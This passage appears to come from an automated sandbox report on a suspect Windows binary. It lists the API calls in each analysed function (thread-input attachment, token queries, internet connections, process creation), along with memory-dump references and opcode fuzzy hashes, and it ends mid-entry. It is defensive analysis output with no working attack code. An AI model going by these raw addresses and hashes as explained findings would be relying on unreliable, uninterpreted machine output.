                                                              • Part of subcall function 0020387D: AttachThreadInput.USER32(00000000,?,002052A7), ref: 002038A5
                                                            • GetCaretPos.USER32(?), ref: 0022519A
                                                            • ClientToScreen.USER32(00000000,?), ref: 002251D5
                                                            • GetForegroundWindow.USER32 ref: 002251DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: 39edd2e203381c269cde4fe597284d835b13930da232b40f93e901f447388428
                                                            • Instruction ID: f569c1e0f9d09a836790079fd280b61cdffb5074a5267069fbf4a36794ba6108
                                                            • Opcode Fuzzy Hash: 39edd2e203381c269cde4fe597284d835b13930da232b40f93e901f447388428
                                                            • Instruction Fuzzy Hash: CF314D75A00118AFCB00EFA5C985AEFB7FDEF99300F10806AE405E7251EB759E41CBA0
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • GetCursorPos.USER32(?), ref: 0022C7C2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,001DBBFB,?,?,?,?,?), ref: 0022C7D7
                                                            • GetCursorPos.USER32(?), ref: 0022C824
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,001DBBFB,?,?,?), ref: 0022C85E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: 719d59785f5eb50ac53e9c83289eb6d132b0660eecd5e5beaf9f40d76eba5c8a
                                                            • Instruction ID: 9194687a5e4f6ac3e0627fd3e70df2b8a6494442990c08cf7fb5f1f226e99f06
                                                            • Opcode Fuzzy Hash: 719d59785f5eb50ac53e9c83289eb6d132b0660eecd5e5beaf9f40d76eba5c8a
                                                            • Instruction Fuzzy Hash: A9319635510028BFCB26CF98E898EEE7BBAEB49310F548065F9058B261C7315D61DFA1
                                                            APIs
                                                              • Part of subcall function 001F8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001F8669
                                                              • Part of subcall function 001F8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001F8673
                                                              • Part of subcall function 001F8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001F8682
                                                              • Part of subcall function 001F8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001F8689
                                                              • Part of subcall function 001F8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001F869F
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001F8BEB
                                                            • _memcmp.LIBCMT ref: 001F8C0E
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F8C44
                                                            • HeapFree.KERNEL32(00000000), ref: 001F8C4B
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                            • String ID:
                                                            • API String ID: 1592001646-0
                                                            • Opcode ID: 38dc9424aa43ec737e0ad5180fe0d791562665e30502beb73c4c32908153da95
                                                            • Instruction ID: cfc091f74e689110630cc79c8ffb0a8fc32eb22b66858515ced9b3ca3b29f105
                                                            • Opcode Fuzzy Hash: 38dc9424aa43ec737e0ad5180fe0d791562665e30502beb73c4c32908153da95
                                                            • Instruction Fuzzy Hash: 96217A71E4120CEFDB10DFA4C949BFEB7B8EF44354F144069E658AB240DB31AA06CB60
                                                            APIs
                                                            • __setmode.LIBCMT ref: 001C0BF2
                                                              • Part of subcall function 001A5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00207B20,?,?,00000000), ref: 001A5B8C
                                                              • Part of subcall function 001A5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00207B20,?,?,00000000,?,?), ref: 001A5BB0
                                                            • _fprintf.LIBCMT ref: 001C0C29
                                                            • OutputDebugStringW.KERNEL32(?), ref: 001F6331
                                                              • Part of subcall function 001C4CDA: _flsall.LIBCMT ref: 001C4CF3
                                                            • __setmode.LIBCMT ref: 001C0C5E
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                            • String ID:
                                                            • API String ID: 521402451-0
                                                            • Opcode ID: 4cc0f901f9ca794811adcb14d60c84daf54c5606a555f4d429cb92ad2560f590
                                                            • Instruction ID: ad489c1fb60074b84ce3d21fd50059b7bf30e4dcf11b726dcc46b886187c9b07
                                                            • Opcode Fuzzy Hash: 4cc0f901f9ca794811adcb14d60c84daf54c5606a555f4d429cb92ad2560f590
                                                            • Instruction Fuzzy Hash: B1112736908208BBCB05B7B4AC46EBE7B699F76320F14015DF204971D2DF219D968795
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00211A97
                                                              • Part of subcall function 00211B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00211B40
                                                              • Part of subcall function 00211B21: InternetCloseHandle.WININET(00000000), ref: 00211BDD
                                                            Similarity
                                                            • API ID: Internet$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 1463438336-0
                                                            • Opcode ID: e48fd6a9f7b07f098852db9e941259beb6b7fec15decc2d15c76cf88a023e9c3
                                                            • Instruction ID: 5346da918c2c6b9fa13b51d945636753e8ec490e292c74bdfa996e0ecec15a73
                                                            • Opcode Fuzzy Hash: e48fd6a9f7b07f098852db9e941259beb6b7fec15decc2d15c76cf88a023e9c3
                                                            • Instruction Fuzzy Hash: FB21BE35214601BFDB259F609C04FFABBF9FF68700F10002AFA4196650EB71A9719BA0
                                                            APIs
                                                              • Part of subcall function 001FF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,001FE1C4,?,?,?,001FEFB7,00000000,000000EF,00000119,?,?), ref: 001FF5BC
                                                              • Part of subcall function 001FF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 001FF5E2
                                                              • Part of subcall function 001FF5AD: lstrcmpiW.KERNEL32(00000000,?,001FE1C4,?,?,?,001FEFB7,00000000,000000EF,00000119,?,?), ref: 001FF613
                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,001FEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 001FE1DD
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 001FE203
                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,001FEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 001FE237
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen
                                                            • String ID: cdecl
                                                            • API String ID: 4031866154-3896280584
                                                            • Opcode ID: 41035fd5f5488e973da2a0544d80b6bdbf57f42ad718dc7cfc5652f2bc6e1f06
                                                            • Instruction ID: 96adf3a28a3f7e6afb946ff5c9ecc47aaa28e1a0ca66805892da59ca1c7b76ed
                                                            • Opcode Fuzzy Hash: 41035fd5f5488e973da2a0544d80b6bdbf57f42ad718dc7cfc5652f2bc6e1f06
                                                            • Instruction Fuzzy Hash: D0118E3A200349EFCB25AF64D849E7A77F8FF95350B40402AF906CB260FB71D85197A0
                                                            APIs
                                                            • _free.LIBCMT ref: 001D5351
                                                              • Part of subcall function 001C594C: __FF_MSGBANNER.LIBCMT ref: 001C5963
                                                              • Part of subcall function 001C594C: __NMSG_WRITE.LIBCMT ref: 001C596A
                                                              • Part of subcall function 001C594C: RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,00000000,?,?,?,001C1013,?), ref: 001C598F
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: a99044c5352a09afb001fb14f85c9e0ce0d5ed8fac23b48fd651ef9f39f44894
                                                            • Instruction ID: be2b96361a7c90c74a7c39668ff95fb3a65038d16f8e59b601c372a08e223060
                                                            • Opcode Fuzzy Hash: a99044c5352a09afb001fb14f85c9e0ce0d5ed8fac23b48fd651ef9f39f44894
                                                            • Instruction Fuzzy Hash: B1119432904A15BFCB353FB4A845B6A3BA67F307E4B10442FF94596291DFB5C9418790
                                                            APIs
                                                            • _memset.LIBCMT ref: 001A4560
                                                              • Part of subcall function 001A410D: _memset.LIBCMT ref: 001A418D
                                                              • Part of subcall function 001A410D: _wcscpy.LIBCMT ref: 001A41E1
                                                              • Part of subcall function 001A410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001A41F1
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 001A45B5
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001A45C4
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001DD6CE
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                            • String ID:
                                                            • API String ID: 1378193009-0
                                                            • Opcode ID: ecadd648084d51fb92422aa1575d237965ade4c1f57cd219086f8a1a7c0c1a00
                                                            • Instruction ID: b903c8f652de4a8a62419089035b70414bf4dd3dabdf965f60d9980a9d41197f
                                                            • Opcode Fuzzy Hash: ecadd648084d51fb92422aa1575d237965ade4c1f57cd219086f8a1a7c0c1a00
                                                            • Instruction Fuzzy Hash: 8521FC74904784AFE7328B24EC59BE7BFEC9F51304F04009EE69D56245C7B45A89CB91
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002040D1
                                                            • _memset.LIBCMT ref: 002040F2
                                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00204144
                                                            • CloseHandle.KERNEL32(00000000), ref: 0020414D
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                                            • String ID:
                                                            • API String ID: 1157408455-0
                                                            • Opcode ID: e247ce85ca62ea5e0bc62cda80021a9587e9130641ef3bd77f4d3b8aeb5fca74
                                                            • Instruction ID: 3c7d73020449cc47aff0c4f79a5727907f88b19acb47630b1c4682b48f2f1fad
                                                            • Opcode Fuzzy Hash: e247ce85ca62ea5e0bc62cda80021a9587e9130641ef3bd77f4d3b8aeb5fca74
                                                            • Instruction Fuzzy Hash: C111EB759113287AD7309BA5AC4DFABBB7CEF44760F1041AAF908E7180D6744E808BA4
                                                            APIs
                                                              • Part of subcall function 001A5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00207B20,?,?,00000000), ref: 001A5B8C
                                                              • Part of subcall function 001A5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00207B20,?,?,00000000,?,?), ref: 001A5BB0
                                                            • gethostbyname.WSOCK32(?,?,?), ref: 002166AC
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002166B7
                                                            • _memmove.LIBCMT ref: 002166E4
                                                            • inet_ntoa.WSOCK32(?), ref: 002166EF
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 1504782959-0
                                                            • Opcode ID: 6c8eb05ec8aeb16110b6639677d8799762196895a7d72a3f855ac00d1c8e9134
                                                            • Instruction ID: d9ed91455e91547ce5451a2a5ef791e2e79a4ba02f83ca78c14bc4296500eb36
                                                            • Opcode Fuzzy Hash: 6c8eb05ec8aeb16110b6639677d8799762196895a7d72a3f855ac00d1c8e9134
                                                            • Instruction Fuzzy Hash: 97118239510509AFCB00FFA4DE86DEEB7B9EF65310B144065F502A7161DF30AE54CB61
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 001F9043
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001F9055
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001F906B
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001F9086
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 49f3795e913b68ef0dffc4befe5149073211225d3d79c172ee75820ea426a3b3
                                                            • Instruction ID: 9cf63061d1feee4e43596659eca3c680f81b23c1b732c3c026391b993b264728
                                                            • Opcode Fuzzy Hash: 49f3795e913b68ef0dffc4befe5149073211225d3d79c172ee75820ea426a3b3
                                                            • Instruction Fuzzy Hash: CE113A79900218BFDB10DFA5C984FADBB78FB48310F2040A5EA04B7250DB726E10DB90
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 001A12D8
                                                            • GetClientRect.USER32(?,?), ref: 001DB84B
                                                            • GetCursorPos.USER32(?), ref: 001DB855
                                                            • ScreenToClient.USER32(?,?), ref: 001DB860
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            • Opcode ID: 9876e0787d581b78a334701cd93af2e89400fbe49af35b65e1f0387f8c2600f6
                                                            • Instruction ID: 5986b6c9750f47f5e1f445c51bf1e06b773648d505b74b208fafcf8d6c5473c1
                                                            • Opcode Fuzzy Hash: 9876e0787d581b78a334701cd93af2e89400fbe49af35b65e1f0387f8c2600f6
                                                            • Instruction Fuzzy Hash: C4113D39500019BFCB10DF94D989AFE77B8EB06300F500466F911E7150C730BA528BA5
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002001FD,?,00201250,?,00008000), ref: 0020166F
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,002001FD,?,00201250,?,00008000), ref: 00201694
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002001FD,?,00201250,?,00008000), ref: 0020169E
                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,002001FD,?,00201250,?,00008000), ref: 002016D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID:
                                                            • API String ID: 2875609808-0
                                                            • Opcode ID: ca62b8cfea0deaabf56dfa601231a0485dfc310bdaaae898df8f7c42b4cce65e
                                                            • Instruction ID: b5da52f2160e65a1f13c0038f0503e678982eaf95ae9d77ee0dd1e7fd2d7e637
                                                            • Opcode Fuzzy Hash: ca62b8cfea0deaabf56dfa601231a0485dfc310bdaaae898df8f7c42b4cce65e
                                                            • Instruction Fuzzy Hash: 99114531C20629EBCF009FA6ED48AEEBB7CFF09701F444069E944B2281CB7195718B96
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction ID: 6270914f8c5851b9941e5d401f6ea8fed6fa387a0a2630327553ce1e6461add4
                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction Fuzzy Hash: 6901803204418ABBCF165E84CC028EE3F22BF29354B498616FA1858271E337D9B1AB81
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 0022B59E
                                                            • ScreenToClient.USER32(?,?), ref: 0022B5B6
                                                            • ScreenToClient.USER32(?,?), ref: 0022B5DA
                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0022B5F5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: ed9d91b897c2fa8e9e614409143a1f6fe999fda0306e399bd4e3b8aed6bffc72
                                                            • Instruction ID: 715c555d904e707c8bc60d22f443a9b8e0377c9a7f0343d2b68454b2d93db4ac
                                                            • Opcode Fuzzy Hash: ed9d91b897c2fa8e9e614409143a1f6fe999fda0306e399bd4e3b8aed6bffc72
                                                            • Instruction Fuzzy Hash: 811166B5D00209EFDB51CFD9D5449EEFBB9FB08310F104166E914E3220D731AA618F50
                                                            APIs
                                                            • _memset.LIBCMT ref: 0022B8FE
                                                            • _memset.LIBCMT ref: 0022B90D
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00267F20,00267F64), ref: 0022B93C
                                                            • CloseHandle.KERNEL32 ref: 0022B94E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3277943733-0
                                                            • Opcode ID: c82ba17455afed7884fa2b6caf34eac79e565b18144aedc91b255a41bb4017bf
                                                            • Instruction ID: 24f06a34d8720ab2d62a7813b5dc24f15c1ed0825a3a7ee308209b256b92296a
                                                            • Opcode Fuzzy Hash: c82ba17455afed7884fa2b6caf34eac79e565b18144aedc91b255a41bb4017bf
                                                            • Instruction Fuzzy Hash: 98F082B25543107BF2206BA1BC59FBB3A5CEB1935CF008070FB08D55A2D7B28D2087A8
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 00206E88
                                                              • Part of subcall function 0020794E: _memset.LIBCMT ref: 00207983
                                                            • _memmove.LIBCMT ref: 00206EAB
                                                            • _memset.LIBCMT ref: 00206EB8
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00206EC8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                            • String ID:
                                                            • API String ID: 48991266-0
                                                            • Opcode ID: 09d2e17aaaf9641a55c73f3cc2a3ea3d33401ddd499e62a6c30b1a0bb6de5802
                                                            • Instruction ID: eb6bc765a9e6dda13337ff38b9cef38c49e2cef637b025d31e6bc04795728155
                                                            • Opcode Fuzzy Hash: 09d2e17aaaf9641a55c73f3cc2a3ea3d33401ddd499e62a6c30b1a0bb6de5802
                                                            • Instruction Fuzzy Hash: F0F0303A100204BBCF516F55EC85E8ABB29EF55320B048065FE085E25BC731E921CBB4
                                                            APIs
                                                              • Part of subcall function 001A12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001A134D
                                                              • Part of subcall function 001A12F3: SelectObject.GDI32(?,00000000), ref: 001A135C
                                                              • Part of subcall function 001A12F3: BeginPath.GDI32(?), ref: 001A1373
                                                              • Part of subcall function 001A12F3: SelectObject.GDI32(?,00000000), ref: 001A139C
                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0022C030
                                                            • LineTo.GDI32(00000000,?,?), ref: 0022C03D
                                                            • EndPath.GDI32(00000000), ref: 0022C04D
                                                            • StrokePath.GDI32(00000000), ref: 0022C05B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                            • String ID:
                                                            • API String ID: 1539411459-0
                                                            • Opcode ID: 695ffc46cc4dfebc455bb51f99636b1bbbcf3ba9f792639383f0da17a7f5d541
                                                            • Instruction ID: 5e77096060340078131009f6fcdbd5b3717bc6d7e7dea7a9bfba3bc87362a6a3
                                                            • Opcode Fuzzy Hash: 695ffc46cc4dfebc455bb51f99636b1bbbcf3ba9f792639383f0da17a7f5d541
                                                            • Instruction Fuzzy Hash: 56F08232001269FBDB226F95BD0DFCE3F69AF06711F248010FA11610E287B55666CFD9
                                                            APIs
                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 001FA399
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 001FA3AC
                                                            • GetCurrentThreadId.KERNEL32 ref: 001FA3B3
                                                            • AttachThreadInput.USER32(00000000), ref: 001FA3BA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 2710830443-0
                                                            • Opcode ID: a2db6936ae447cfcefb7293e8a62d8ff8957c09309487bc798cd762f21994b6d
                                                            • Instruction ID: c25c25e36d078bc3df56b8f31071bb391b359d8f11aea1e8359edecc6a646ae1
                                                            • Opcode Fuzzy Hash: a2db6936ae447cfcefb7293e8a62d8ff8957c09309487bc798cd762f21994b6d
                                                            • Instruction Fuzzy Hash: 5BE03971541228BADB201FA2EE0CEE73F6CFF167A1F808034F60C84060C7799541CBA0
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 001A2231
                                                            • SetTextColor.GDI32(?,000000FF), ref: 001A223B
                                                            • SetBkMode.GDI32(?,00000001), ref: 001A2250
                                                            • GetStockObject.GDI32(00000005), ref: 001A2258
                                                            • GetWindowDC.USER32(?,00000000), ref: 001DC0D3
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 001DC0E0
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 001DC0F9
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 001DC112
                                                            • GetPixel.GDI32(00000000,?,?), ref: 001DC132
                                                            • ReleaseDC.USER32(?,00000000), ref: 001DC13D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1946975507-0
                                                            • Opcode ID: a1b11d8f3b3da7e5fb39a80ed482949953f6fcf34425f1129e22e759417c0a3d
                                                            • Instruction ID: be32ea6a9e602c5da04fe9dc12eab8a5769a9865ed23d971982c40ba21290dae
                                                            • Opcode Fuzzy Hash: a1b11d8f3b3da7e5fb39a80ed482949953f6fcf34425f1129e22e759417c0a3d
                                                            • Instruction Fuzzy Hash: 8BE03932100244FADB615FA8FD0DBD83B20AB15332F448376FA69480E187B149A1DB51
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 001F8C63
